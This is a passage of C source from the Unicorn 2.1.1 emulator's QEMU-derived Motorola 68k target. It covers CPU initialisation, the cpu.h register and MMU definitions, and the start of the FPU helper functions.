m68k_set_feature(env, M68K_FEATURE_BRAL); m68k_set_feature(env, M68K_FEATURE_CF_FPU); /* * MAC and EMAC are mutually exclusive, so pick EMAC. * It's mostly backwards compatible. */ m68k_set_feature(env, M68K_FEATURE_CF_EMAC); m68k_set_feature(env, M68K_FEATURE_CF_EMAC_B); m68k_set_feature(env, M68K_FEATURE_USP); m68k_set_feature(env, M68K_FEATURE_EXT_FULL); m68k_set_feature(env, M68K_FEATURE_WORD_INDEX); } static void m68k_cpu_realizefn(CPUState *dev) { CPUState *cs = CPU(dev); M68kCPU *cpu = M68K_CPU(dev); register_m68k_insns(&cpu->env); cpu_exec_realizefn(cs); } static void m68k_cpu_initfn(struct uc_struct *uc, CPUState *obj) { M68kCPU *cpu = M68K_CPU(obj); CPUM68KState *env = &cpu->env; env->uc = uc; cpu_set_cpustate_pointers(cpu); } static void m68k_cpu_class_init(CPUClass *c) { M68kCPUClass *mcc = M68K_CPU_CLASS(c); CPUClass *cc = CPU_CLASS(c); /* parent class is CPUClass, parent_reset() is cpu_common_reset(). */ mcc->parent_reset = cc->reset; /* overwrite the CPUClass->reset with the arch reset: m68k_cpu_reset(). */ cc->reset = m68k_cpu_reset; cc->has_work = m68k_cpu_has_work; cc->do_interrupt = m68k_cpu_do_interrupt; cc->cpu_exec_interrupt = m68k_cpu_exec_interrupt; cc->set_pc = m68k_cpu_set_pc; cc->tlb_fill_cpu = m68k_cpu_tlb_fill; cc->get_phys_page_debug = m68k_cpu_get_phys_page_debug; cc->tcg_initialize = m68k_tcg_init; } #define DEFINE_M68K_CPU_TYPE(cpu_model, initfn) \ { \ .name = cpu_model, \ .initfn = initfn, \ } struct M68kCPUInfo { const char *name; void (*initfn)(CPUState *obj); }; static struct M68kCPUInfo m68k_cpus_type_infos[] = { { "m68000", m68000_cpu_initfn }, { "m68020", m68020_cpu_initfn }, { "m68030", m68030_cpu_initfn }, { "m68040", m68040_cpu_initfn }, { "m68060", m68060_cpu_initfn }, { "m5206", m5206_cpu_initfn }, { "m5208", m5208_cpu_initfn }, { "cfv4e", cfv4e_cpu_initfn }, { "any", any_cpu_initfn }, }; M68kCPU *cpu_m68k_init(struct uc_struct *uc) { M68kCPU *cpu; CPUState *cs; CPUClass *cc; cpu = calloc(1, sizeof(*cpu)); if (cpu == NULL) { return NULL; } if (uc->cpu_model == INT_MAX) { uc->cpu_model = UC_CPU_M68K_CFV4E; // cfv4e } else if (uc->cpu_model >= ARRAY_SIZE(m68k_cpus_type_infos)) { free(cpu); return NULL; } cs = (CPUState *)cpu; cc = (CPUClass *)&cpu->cc; cs->cc = cc; cs->uc = uc; uc->cpu = cs; cpu_class_init(uc, cc); m68k_cpu_class_init(cc); cpu_common_initfn(uc, cs); m68k_cpu_initfn(uc, cs); m68k_cpus_type_infos[uc->cpu_model].initfn(cs); m68k_cpu_realizefn(cs); // init address space cpu_address_space_init(cs, 0, cs->memory); qemu_init_vcpu(cs); return cpu; }
unicorn-2.1.1/qemu/target/m68k/cpu.h
/* * m68k virtual CPU header * * Copyright (c) 2005-2007 CodeSourcery * Written by Paul Brook * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version.
* * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifndef M68K_CPU_H #define M68K_CPU_H #include "exec/cpu-defs.h" #include "cpu-qom.h" #define OS_BYTE 0 #define OS_WORD 1 #define OS_LONG 2 #define OS_SINGLE 3 #define OS_DOUBLE 4 #define OS_EXTENDED 5 #define OS_PACKED 6 #define OS_UNSIZED 7 #define MAX_QREGS 32 #define EXCP_ACCESS 2 /* Access (MMU) error. */ #define EXCP_ADDRESS 3 /* Address error. */ #define EXCP_ILLEGAL 4 /* Illegal instruction. */ #define EXCP_DIV0 5 /* Divide by zero */ #define EXCP_CHK 6 /* CHK, CHK2 Instructions */ #define EXCP_TRAPCC 7 /* FTRAPcc, TRAPcc, TRAPV Instructions */ #define EXCP_PRIVILEGE 8 /* Privilege violation. */ #define EXCP_TRACE 9 #define EXCP_LINEA 10 /* Unimplemented line-A (MAC) opcode. */ #define EXCP_LINEF 11 /* Unimplemented line-F (FPU) opcode. */ #define EXCP_DEBUGNBP 12 /* Non-breakpoint debug interrupt. */ #define EXCP_DEBEGBP 13 /* Breakpoint debug interrupt. */ #define EXCP_FORMAT 14 /* RTE format error. */ #define EXCP_UNINITIALIZED 15 #define EXCP_SPURIOUS 24 /* Spurious interrupt */ #define EXCP_INT_LEVEL_1 25 /* Level 1 Interrupt autovector */ #define EXCP_INT_LEVEL_7 31 /* Level 7 Interrupt autovector */ #define EXCP_TRAP0 32 /* User trap #0. */ #define EXCP_TRAP15 47 /* User trap #15. */ #define EXCP_FP_BSUN 48 /* Branch Set on Unordered */ #define EXCP_FP_INEX 49 /* Inexact result */ #define EXCP_FP_DZ 50 /* Divide by Zero */ #define EXCP_FP_UNFL 51 /* Underflow */ #define EXCP_FP_OPERR 52 /* Operand Error */ #define EXCP_FP_OVFL 53 /* Overflow */ #define EXCP_FP_SNAN 54 /* Signaling Not-A-Number */ #define EXCP_FP_UNIMP 55 /* Unimplemented Data type */ #define EXCP_MMU_CONF 56 /* MMU Configuration Error */ #define EXCP_MMU_ILLEGAL 57 /* MMU Illegal Operation Error */ #define EXCP_MMU_ACCESS 58 /* MMU Access Level Violation Error */ #define EXCP_RTE 0x100 #define EXCP_HALT_INSN 0x101 #define M68K_DTTR0 0 #define M68K_DTTR1 1 #define M68K_ITTR0 2 #define M68K_ITTR1 3 #define M68K_MAX_TTR 2 #define TTR(type, index) ttr[((type & ACCESS_CODE) == ACCESS_CODE) * 2 + index] #define TARGET_INSN_START_EXTRA_WORDS 1 typedef CPU_LDoubleU FPReg; typedef struct CPUM68KState { uint32_t dregs[8]; uint32_t aregs[8]; uint32_t pc; uint32_t sr; /* SSP and USP. The current_sp is stored in aregs[7], the other here. */ int current_sp; uint32_t sp[3]; /* Condition flags. */ uint32_t cc_op; uint32_t cc_x; /* always 0/1 */ uint32_t cc_n; /* in bit 31 (i.e. negative) */ uint32_t cc_v; /* in bit 31, unused, or computed from cc_n and cc_v */ uint32_t cc_c; /* either 0/1, unused, or computed from cc_n and cc_v */ uint32_t cc_z; /* == 0 or unused */ FPReg fregs[8]; FPReg fp_result; uint32_t fpcr; uint32_t fpsr; float_status fp_status; uint64_t mactmp; /* * EMAC Hardware deals with 48-bit values composed of one 32-bit and * two 8-bit parts. We store a single 64-bit value and * rearrange/extend this when changing modes. */ uint64_t macc[4]; uint32_t macsr; uint32_t mac_mask; /* MMU status. */ struct { uint32_t ar; uint32_t ssw; /* 68040 */ uint16_t tcr; uint32_t urp; uint32_t srp; bool fault; uint32_t ttr[4]; uint32_t mmusr; } mmu; /* Control registers. 
*/ uint32_t vbr; uint32_t mbar; uint32_t rambar0; uint32_t cacr; uint32_t sfc; uint32_t dfc; int pending_vector; int pending_level; uint32_t qregs[MAX_QREGS]; /* Fields up to this point are cleared by a CPU reset */ int end_reset_fields; /* Fields from here on are preserved across CPU reset. */ uint32_t features; // Unicorn engine struct uc_struct *uc; } CPUM68KState; /* * M68kCPU: * @env: #CPUM68KState * * A Motorola 68k CPU. */ struct M68kCPU { /*< private >*/ CPUState parent_obj; /*< public >*/ CPUNegativeOffsetState neg; CPUM68KState env; struct M68kCPUClass cc; }; void m68k_cpu_do_interrupt(CPUState *cpu); bool m68k_cpu_exec_interrupt(CPUState *cpu, int int_req); hwaddr m68k_cpu_get_phys_page_debug(CPUState *cpu, vaddr addr); void m68k_tcg_init(struct uc_struct *uc); /* * you can call this signal handler from your SIGBUS and SIGSEGV * signal handlers to inform the virtual CPU of exceptions. non zero * is returned if the signal was handled by the virtual CPU. */ int cpu_m68k_signal_handler(int host_signum, void *pinfo, void *puc); uint32_t cpu_m68k_get_ccr(CPUM68KState *env); void cpu_m68k_set_ccr(CPUM68KState *env, uint32_t); void cpu_m68k_set_sr(CPUM68KState *env, uint32_t); void cpu_m68k_set_fpcr(CPUM68KState *env, uint32_t val); /* * Instead of computing the condition codes after each m68k instruction, * QEMU just stores one operand (called CC_SRC), the result * (called CC_DEST) and the type of operation (called CC_OP). When the * condition codes are needed, the condition codes can be calculated * using this information. Condition codes are not generated if they * are only needed for conditional branches. */ typedef enum { /* Translator only -- use env->cc_op. */ CC_OP_DYNAMIC, /* Each flag bit computed into cc_[xcnvz]. */ CC_OP_FLAGS, /* X in cc_x, C = X, N in cc_n, Z in cc_n, V via cc_n/cc_v. */ CC_OP_ADDB, CC_OP_ADDW, CC_OP_ADDL, CC_OP_SUBB, CC_OP_SUBW, CC_OP_SUBL, /* X in cc_x, {N,Z,C,V} via cc_n/cc_v. */ CC_OP_CMPB, CC_OP_CMPW, CC_OP_CMPL, /* X in cc_x, C = 0, V = 0, N in cc_n, Z in cc_n. 
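 * Worked example: after a MOVE.L that loads zero under CC_OP_LOGIC, cc_n
 * holds the 32-bit result, so Z reads back as set (cc_n == 0), N as clear
 * (bit 31 clear), and C/V as clear by definition of this op class.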
*/ CC_OP_LOGIC, CC_OP_NB } CCOp; #define CCF_C 0x01 #define CCF_V 0x02 #define CCF_Z 0x04 #define CCF_N 0x08 #define CCF_X 0x10 #define SR_I_SHIFT 8 #define SR_I 0x0700 #define SR_M 0x1000 #define SR_S 0x2000 #define SR_T_SHIFT 14 #define SR_T 0xc000 #define M68K_SSP 0 #define M68K_USP 1 #define M68K_ISP 2 /* bits for 68040 special status word */ #define M68K_CP_040 0x8000 #define M68K_CU_040 0x4000 #define M68K_CT_040 0x2000 #define M68K_CM_040 0x1000 #define M68K_MA_040 0x0800 #define M68K_ATC_040 0x0400 #define M68K_LK_040 0x0200 #define M68K_RW_040 0x0100 #define M68K_SIZ_040 0x0060 #define M68K_TT_040 0x0018 #define M68K_TM_040 0x0007 #define M68K_TM_040_DATA 0x0001 #define M68K_TM_040_CODE 0x0002 #define M68K_TM_040_SUPER 0x0004 /* bits for 68040 write back status word */ #define M68K_WBV_040 0x80 #define M68K_WBSIZ_040 0x60 #define M68K_WBBYT_040 0x20 #define M68K_WBWRD_040 0x40 #define M68K_WBLNG_040 0x00 #define M68K_WBTT_040 0x18 #define M68K_WBTM_040 0x07 /* bus access size codes */ #define M68K_BA_SIZE_MASK 0x60 #define M68K_BA_SIZE_BYTE 0x20 #define M68K_BA_SIZE_WORD 0x40 #define M68K_BA_SIZE_LONG 0x00 #define M68K_BA_SIZE_LINE 0x60 /* bus access transfer type codes */ #define M68K_BA_TT_MOVE16 0x08 /* bits for 68040 MMU status register (mmusr) */ #define M68K_MMU_B_040 0x0800 #define M68K_MMU_G_040 0x0400 #define M68K_MMU_U1_040 0x0200 #define M68K_MMU_U0_040 0x0100 #define M68K_MMU_S_040 0x0080 #define M68K_MMU_CM_040 0x0060 #define M68K_MMU_M_040 0x0010 #define M68K_MMU_WP_040 0x0004 #define M68K_MMU_T_040 0x0002 #define M68K_MMU_R_040 0x0001 #define M68K_MMU_SR_MASK_040 (M68K_MMU_G_040 | M68K_MMU_U1_040 | \ M68K_MMU_U0_040 | M68K_MMU_S_040 | \ M68K_MMU_CM_040 | M68K_MMU_M_040 | \ M68K_MMU_WP_040) /* bits for 68040 MMU Translation Control Register */ #define M68K_TCR_ENABLED 0x8000 #define M68K_TCR_PAGE_8K 0x4000 /* bits for 68040 MMU Table Descriptor / Page Descriptor / TTR */ #define M68K_DESC_WRITEPROT 0x00000004 #define M68K_DESC_USED 0x00000008 #define M68K_DESC_MODIFIED 0x00000010 #define M68K_DESC_CACHEMODE 0x00000060 #define M68K_DESC_CM_WRTHRU 0x00000000 #define M68K_DESC_CM_COPYBK 0x00000020 #define M68K_DESC_CM_SERIAL 0x00000040 #define M68K_DESC_CM_NCACHE 0x00000060 #define M68K_DESC_SUPERONLY 0x00000080 #define M68K_DESC_USERATTR 0x00000300 #define M68K_DESC_USERATTR_SHIFT 8 #define M68K_DESC_GLOBAL 0x00000400 #define M68K_DESC_URESERVED 0x00000800 #define M68K_ROOT_POINTER_ENTRIES 128 #define M68K_4K_PAGE_MASK (~0xff) #define M68K_POINTER_BASE(entry) (entry & ~0x1ff) #define M68K_ROOT_INDEX(addr) ((address >> 23) & 0x1fc) #define M68K_POINTER_INDEX(addr) ((address >> 16) & 0x1fc) #define M68K_4K_PAGE_BASE(entry) (next & M68K_4K_PAGE_MASK) #define M68K_4K_PAGE_INDEX(addr) ((address >> 10) & 0xfc) #define M68K_8K_PAGE_MASK (~0x7f) #define M68K_8K_PAGE_BASE(entry) (next & M68K_8K_PAGE_MASK) #define M68K_8K_PAGE_INDEX(addr) ((address >> 11) & 0x7c) #define M68K_UDT_VALID(entry) (entry & 2) #define M68K_PDT_VALID(entry) (entry & 3) #define M68K_PDT_INDIRECT(entry) ((entry & 3) == 2) #define M68K_INDIRECT_POINTER(addr) (addr & ~3) #define M68K_TTS_POINTER_SHIFT 18 #define M68K_TTS_ROOT_SHIFT 25 /* bits for 68040 MMU Transparent Translation Registers */ #define M68K_TTR_ADDR_BASE 0xff000000 #define M68K_TTR_ADDR_MASK 0x00ff0000 #define M68K_TTR_ADDR_MASK_SHIFT 8 #define M68K_TTR_ENABLED 0x00008000 #define M68K_TTR_SFIELD 0x00006000 #define M68K_TTR_SFIELD_USER 0x0000 #define M68K_TTR_SFIELD_SUPER 0x2000 /* m68k Control Registers */ /* ColdFire */ /* Memory Management 
Control Registers */ #define M68K_CR_ASID 0x003 #define M68K_CR_ACR0 0x004 #define M68K_CR_ACR1 0x005 #define M68K_CR_ACR2 0x006 #define M68K_CR_ACR3 0x007 #define M68K_CR_MMUBAR 0x008 /* Processor Miscellaneous Registers */ #define M68K_CR_PC 0x80F /* Local Memory and Module Control Registers */ #define M68K_CR_ROMBAR0 0xC00 #define M68K_CR_ROMBAR1 0xC01 #define M68K_CR_RAMBAR0 0xC04 #define M68K_CR_RAMBAR1 0xC05 #define M68K_CR_MPCR 0xC0C #define M68K_CR_EDRAMBAR 0xC0D #define M68K_CR_SECMBAR 0xC0E #define M68K_CR_MBAR 0xC0F /* Local Memory Address Permutation Control Registers */ #define M68K_CR_PCR1U0 0xD02 #define M68K_CR_PCR1L0 0xD03 #define M68K_CR_PCR2U0 0xD04 #define M68K_CR_PCR2L0 0xD05 #define M68K_CR_PCR3U0 0xD06 #define M68K_CR_PCR3L0 0xD07 #define M68K_CR_PCR1U1 0xD0A #define M68K_CR_PCR1L1 0xD0B #define M68K_CR_PCR2U1 0xD0C #define M68K_CR_PCR2L1 0xD0D #define M68K_CR_PCR3U1 0xD0E #define M68K_CR_PCR3L1 0xD0F /* MC680x0 */ /* MC680[1234]0/CPU32 */ #define M68K_CR_SFC 0x000 #define M68K_CR_DFC 0x001 #define M68K_CR_USP 0x800 #define M68K_CR_VBR 0x801 /* + Coldfire */ /* MC680[234]0 */ #define M68K_CR_CACR 0x002 /* + Coldfire */ #define M68K_CR_CAAR 0x802 /* MC68020 and MC68030 only */ #define M68K_CR_MSP 0x803 #define M68K_CR_ISP 0x804 /* MC68040/MC68LC040 */ #define M68K_CR_TC 0x003 #define M68K_CR_ITT0 0x004 #define M68K_CR_ITT1 0x005 #define M68K_CR_DTT0 0x006 #define M68K_CR_DTT1 0x007 #define M68K_CR_MMUSR 0x805 #define M68K_CR_URP 0x806 #define M68K_CR_SRP 0x807 /* MC68EC040 */ #define M68K_CR_IACR0 0x004 #define M68K_CR_IACR1 0x005 #define M68K_CR_DACR0 0x006 #define M68K_CR_DACR1 0x007 #define M68K_FPIAR_SHIFT 0 #define M68K_FPIAR (1 << M68K_FPIAR_SHIFT) #define M68K_FPSR_SHIFT 1 #define M68K_FPSR (1 << M68K_FPSR_SHIFT) #define M68K_FPCR_SHIFT 2 #define M68K_FPCR (1 << M68K_FPCR_SHIFT) /* Floating-Point Status Register */ /* Condition Code */ #define FPSR_CC_MASK 0x0f000000 #define FPSR_CC_A 0x01000000 /* Not-A-Number */ #define FPSR_CC_I 0x02000000 /* Infinity */ #define FPSR_CC_Z 0x04000000 /* Zero */ #define FPSR_CC_N 0x08000000 /* Negative */ /* Quotient */ #define FPSR_QT_MASK 0x00ff0000 #define FPSR_QT_SHIFT 16 /* Floating-Point Control Register */ /* Rounding mode */ #define FPCR_RND_MASK 0x0030 #define FPCR_RND_N 0x0000 #define FPCR_RND_Z 0x0010 #define FPCR_RND_M 0x0020 #define FPCR_RND_P 0x0030 /* Rounding precision */ #define FPCR_PREC_MASK 0x00c0 #define FPCR_PREC_X 0x0000 #define FPCR_PREC_S 0x0040 #define FPCR_PREC_D 0x0080 #define FPCR_PREC_U 0x00c0 #define FPCR_EXCP_MASK 0xff00 /* CACR fields are implementation defined, but some bits are common. */ #define M68K_CACR_EUSP 0x10 #define MACSR_PAV0 0x100 #define MACSR_OMC 0x080 #define MACSR_SU 0x040 #define MACSR_FI 0x020 #define MACSR_RT 0x010 #define MACSR_N 0x008 #define MACSR_Z 0x004 #define MACSR_V 0x002 #define MACSR_EV 0x001 void m68k_set_irq_level(M68kCPU *cpu, int level, uint8_t vector); void m68k_switch_sp(CPUM68KState *env); void do_m68k_semihosting(CPUM68KState *env, int nr); /* * There are 4 ColdFire core ISA revisions: A, A+, B and C. * Each feature covers the subset of instructions common to the * ISA revisions mentioned. */ enum m68k_features { M68K_FEATURE_M68000, M68K_FEATURE_M68020, M68K_FEATURE_M68030, M68K_FEATURE_M68040, M68K_FEATURE_M68060, M68K_FEATURE_CF_ISA_A, M68K_FEATURE_CF_ISA_B, /* (ISA B or C). */ M68K_FEATURE_CF_ISA_APLUSC, /* BIT/BITREV, FF1, STRLDSR (ISA A+ or C). */ M68K_FEATURE_BRAL, /* Long unconditional branch. (ISA A+ or B). 
*/ M68K_FEATURE_CF_FPU, M68K_FEATURE_CF_MAC, M68K_FEATURE_CF_EMAC, M68K_FEATURE_CF_EMAC_B, /* Revision B EMAC (dual accumulate). */ M68K_FEATURE_USP, /* User Stack Pointer. (ISA A+, B or C). */ M68K_FEATURE_EXT_FULL, /* 68020+ full extension word. */ M68K_FEATURE_WORD_INDEX, /* word sized address index registers. */ M68K_FEATURE_SCALED_INDEX, /* scaled address index registers. */ M68K_FEATURE_LONG_MULDIV, /* 32 bit multiply/divide. */ M68K_FEATURE_QUAD_MULDIV, /* 64 bit multiply/divide. */ M68K_FEATURE_BCCL, /* Long conditional branches. */ M68K_FEATURE_BITFIELD, /* Bit field insns. */ M68K_FEATURE_FPU, M68K_FEATURE_CAS, M68K_FEATURE_BKPT, M68K_FEATURE_RTD, M68K_FEATURE_CHK2, M68K_FEATURE_MOVEP, }; static inline int m68k_feature(CPUM68KState *env, int feature) { return (env->features & (1u << feature)) != 0; } void m68k_cpu_list(void); void register_m68k_insns (CPUM68KState *env); enum { /* 1 bit to define user level / supervisor access */ ACCESS_SUPER = 0x01, /* 1 bit to indicate direction */ ACCESS_STORE = 0x02, /* 1 bit to indicate debug access */ ACCESS_DEBUG = 0x04, /* PTEST instruction */ ACCESS_PTEST = 0x08, /* Type of instruction that generated the access */ ACCESS_CODE = 0x10, /* Code fetch access */ ACCESS_DATA = 0x20, /* Data load/store access */ }; #define cpu_signal_handler cpu_m68k_signal_handler #define cpu_list m68k_cpu_list /* MMU modes definitions */ #define MMU_KERNEL_IDX 0 #define MMU_USER_IDX 1 static inline int cpu_mmu_index (CPUM68KState *env, bool ifetch) { return (env->sr & SR_S) == 0 ? 1 : 0; } bool m68k_cpu_tlb_fill(CPUState *cs, vaddr address, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr); void m68k_cpu_transaction_failed(CPUState *cs, hwaddr physaddr, vaddr addr, unsigned size, MMUAccessType access_type, int mmu_idx, MemTxAttrs attrs, MemTxResult response, uintptr_t retaddr); typedef CPUM68KState CPUArchState; typedef M68kCPU ArchCPU; #include "exec/cpu-all.h" /* TB flags */ #define TB_FLAGS_MACSR 0x0f #define TB_FLAGS_MSR_S_BIT 13 #define TB_FLAGS_MSR_S (1 << TB_FLAGS_MSR_S_BIT) #define TB_FLAGS_SFC_S_BIT 14 #define TB_FLAGS_SFC_S (1 << TB_FLAGS_SFC_S_BIT) #define TB_FLAGS_DFC_S_BIT 15 #define TB_FLAGS_DFC_S (1 << TB_FLAGS_DFC_S_BIT) static inline void cpu_get_tb_cpu_state(CPUM68KState *env, target_ulong *pc, target_ulong *cs_base, uint32_t *flags) { *pc = env->pc; *cs_base = 0; *flags = (env->macsr >> 4) & TB_FLAGS_MACSR; if (env->sr & SR_S) { *flags |= TB_FLAGS_MSR_S; *flags |= (env->sfc << (TB_FLAGS_SFC_S_BIT - 2)) & TB_FLAGS_SFC_S; *flags |= (env->dfc << (TB_FLAGS_DFC_S_BIT - 2)) & TB_FLAGS_DFC_S; } } // M68kCPU *cpu_m68k_init(struct uc_struct *uc, const char *cpu_model); #endif 
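/*
 * Usage sketch (not in the original header): cpu_m68k_init() in cpu.c
 * indexes m68k_cpus_type_infos[] with uc->cpu_model and defaults to
 * UC_CPU_M68K_CFV4E. Through the public API the model is chosen right
 * after uc_open(), before emulation starts:
 *
 *   uc_engine *uc;
 *   uc_open(UC_ARCH_M68K, UC_MODE_BIG_ENDIAN, &uc);
 *   uc_ctl_set_cpu_model(uc, UC_CPU_M68K_CFV4E);
 */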
unicorn-2.1.1/qemu/target/m68k/fpu_helper.c
/* * m68k FPU helpers * * Copyright (c) 2006-2007 CodeSourcery * Written by Paul Brook * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "softfloat.h" /* * Undefined offsets may be different on various FPU.
* On 68040 they return 0.0 (floatx80_zero) */ static const floatx80 fpu_rom[128] = { [0x00] = make_floatx80_init(0x4000, 0xc90fdaa22168c235ULL), /* Pi */ [0x0b] = make_floatx80_init(0x3ffd, 0x9a209a84fbcff798ULL), /* Log10(2) */ [0x0c] = make_floatx80_init(0x4000, 0xadf85458a2bb4a9aULL), /* e */ [0x0d] = make_floatx80_init(0x3fff, 0xb8aa3b295c17f0bcULL), /* Log2(e) */ [0x0e] = make_floatx80_init(0x3ffd, 0xde5bd8a937287195ULL), /* Log10(e) */ [0x0f] = make_floatx80_init(0x0000, 0x0000000000000000ULL), /* Zero */ [0x30] = make_floatx80_init(0x3ffe, 0xb17217f7d1cf79acULL), /* ln(2) */ [0x31] = make_floatx80_init(0x4000, 0x935d8dddaaa8ac17ULL), /* ln(10) */ [0x32] = make_floatx80_init(0x3fff, 0x8000000000000000ULL), /* 10^0 */ [0x33] = make_floatx80_init(0x4002, 0xa000000000000000ULL), /* 10^1 */ [0x34] = make_floatx80_init(0x4005, 0xc800000000000000ULL), /* 10^2 */ [0x35] = make_floatx80_init(0x400c, 0x9c40000000000000ULL), /* 10^4 */ [0x36] = make_floatx80_init(0x4019, 0xbebc200000000000ULL), /* 10^8 */ [0x37] = make_floatx80_init(0x4034, 0x8e1bc9bf04000000ULL), /* 10^16 */ [0x38] = make_floatx80_init(0x4069, 0x9dc5ada82b70b59eULL), /* 10^32 */ [0x39] = make_floatx80_init(0x40d3, 0xc2781f49ffcfa6d5ULL), /* 10^64 */ [0x3a] = make_floatx80_init(0x41a8, 0x93ba47c980e98ce0ULL), /* 10^128 */ [0x3b] = make_floatx80_init(0x4351, 0xaa7eebfb9df9de8eULL), /* 10^256 */ [0x3c] = make_floatx80_init(0x46a3, 0xe319a0aea60e91c7ULL), /* 10^512 */ [0x3d] = make_floatx80_init(0x4d48, 0xc976758681750c17ULL), /* 10^1024 */ [0x3e] = make_floatx80_init(0x5a92, 0x9e8b3b5dc53d5de5ULL), /* 10^2048 */ [0x3f] = make_floatx80_init(0x7525, 0xc46052028a20979bULL), /* 10^4096 */ }; int32_t HELPER(reds32)(CPUM68KState *env, FPReg *val) { return floatx80_to_int32(val->d, &env->fp_status); } float32 HELPER(redf32)(CPUM68KState *env, FPReg *val) { return floatx80_to_float32(val->d, &env->fp_status); } void HELPER(exts32)(CPUM68KState *env, FPReg *res, int32_t val) { res->d = int32_to_floatx80(val, &env->fp_status); } void HELPER(extf32)(CPUM68KState *env, FPReg *res, float32 val) { res->d = float32_to_floatx80(val, &env->fp_status); } void HELPER(extf64)(CPUM68KState *env, FPReg *res, float64 val) { res->d = float64_to_floatx80(val, &env->fp_status); } float64 HELPER(redf64)(CPUM68KState *env, FPReg *val) { return floatx80_to_float64(val->d, &env->fp_status); } void HELPER(firound)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_round_to_int(val->d, &env->fp_status); } static void m68k_restore_precision_mode(CPUM68KState *env) { switch (env->fpcr & FPCR_PREC_MASK) { case FPCR_PREC_X: /* extended */ set_floatx80_rounding_precision(80, &env->fp_status); break; case FPCR_PREC_S: /* single */ set_floatx80_rounding_precision(32, &env->fp_status); break; case FPCR_PREC_D: /* double */ set_floatx80_rounding_precision(64, &env->fp_status); break; case FPCR_PREC_U: /* undefined */ default: break; } } static void cf_restore_precision_mode(CPUM68KState *env) { if (env->fpcr & FPCR_PREC_S) { /* single */ set_floatx80_rounding_precision(32, &env->fp_status); } else { /* double */ set_floatx80_rounding_precision(64, &env->fp_status); } } static void restore_rounding_mode(CPUM68KState *env) { switch (env->fpcr & FPCR_RND_MASK) { case FPCR_RND_N: /* round to nearest */ set_float_rounding_mode(float_round_nearest_even, &env->fp_status); break; case FPCR_RND_Z: /* round to zero */ set_float_rounding_mode(float_round_to_zero, &env->fp_status); break; case FPCR_RND_M: /* round toward minus infinity */ 
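/*
 * FPCR_RND_MASK is 0x0030, so the rounding mode occupies FPCR bits 5:4
 * (00 nearest, 01 toward zero, 10 toward -inf, 11 toward +inf). Worked
 * example: cpu_m68k_set_fpcr(env, 0x0020) selects this branch and maps
 * the mode onto softfloat's float_round_down.
 */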
set_float_rounding_mode(float_round_down, &env->fp_status); break; case FPCR_RND_P: /* round toward positive infinity */ set_float_rounding_mode(float_round_up, &env->fp_status); break; } } void cpu_m68k_set_fpcr(CPUM68KState *env, uint32_t val) { env->fpcr = val & 0xffff; if (m68k_feature(env, M68K_FEATURE_CF_FPU)) { cf_restore_precision_mode(env); } else { m68k_restore_precision_mode(env); } restore_rounding_mode(env); } void HELPER(fitrunc)(CPUM68KState *env, FPReg *res, FPReg *val) { int rounding_mode = get_float_rounding_mode(&env->fp_status); set_float_rounding_mode(float_round_to_zero, &env->fp_status); res->d = floatx80_round_to_int(val->d, &env->fp_status); set_float_rounding_mode(rounding_mode, &env->fp_status); } void HELPER(set_fpcr)(CPUM68KState *env, uint32_t val) { cpu_m68k_set_fpcr(env, val); } #define PREC_BEGIN(prec) \ do { \ int old; \ old = get_floatx80_rounding_precision(&env->fp_status); \ set_floatx80_rounding_precision(prec, &env->fp_status) \ #define PREC_END() \ set_floatx80_rounding_precision(old, &env->fp_status); \ } while (0) void HELPER(fsround)(CPUM68KState *env, FPReg *res, FPReg *val) { PREC_BEGIN(32); res->d = floatx80_round(val->d, &env->fp_status); PREC_END(); } void HELPER(fdround)(CPUM68KState *env, FPReg *res, FPReg *val) { PREC_BEGIN(64); res->d = floatx80_round(val->d, &env->fp_status); PREC_END(); } void HELPER(fsqrt)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_sqrt(val->d, &env->fp_status); } void HELPER(fssqrt)(CPUM68KState *env, FPReg *res, FPReg *val) { PREC_BEGIN(32); res->d = floatx80_sqrt(val->d, &env->fp_status); PREC_END(); } void HELPER(fdsqrt)(CPUM68KState *env, FPReg *res, FPReg *val) { PREC_BEGIN(64); res->d = floatx80_sqrt(val->d, &env->fp_status); PREC_END(); } void HELPER(fabs)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_round(floatx80_abs(val->d), &env->fp_status); } void HELPER(fsabs)(CPUM68KState *env, FPReg *res, FPReg *val) { PREC_BEGIN(32); res->d = floatx80_round(floatx80_abs(val->d), &env->fp_status); PREC_END(); } void HELPER(fdabs)(CPUM68KState *env, FPReg *res, FPReg *val) { PREC_BEGIN(64); res->d = floatx80_round(floatx80_abs(val->d), &env->fp_status); PREC_END(); } void HELPER(fneg)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_round(floatx80_chs(val->d), &env->fp_status); } void HELPER(fsneg)(CPUM68KState *env, FPReg *res, FPReg *val) { PREC_BEGIN(32); res->d = floatx80_round(floatx80_chs(val->d), &env->fp_status); PREC_END(); } void HELPER(fdneg)(CPUM68KState *env, FPReg *res, FPReg *val) { PREC_BEGIN(64); res->d = floatx80_round(floatx80_chs(val->d), &env->fp_status); PREC_END(); } void HELPER(fadd)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { res->d = floatx80_add(val0->d, val1->d, &env->fp_status); } void HELPER(fsadd)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { PREC_BEGIN(32); res->d = floatx80_add(val0->d, val1->d, &env->fp_status); PREC_END(); } void HELPER(fdadd)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { PREC_BEGIN(64); res->d = 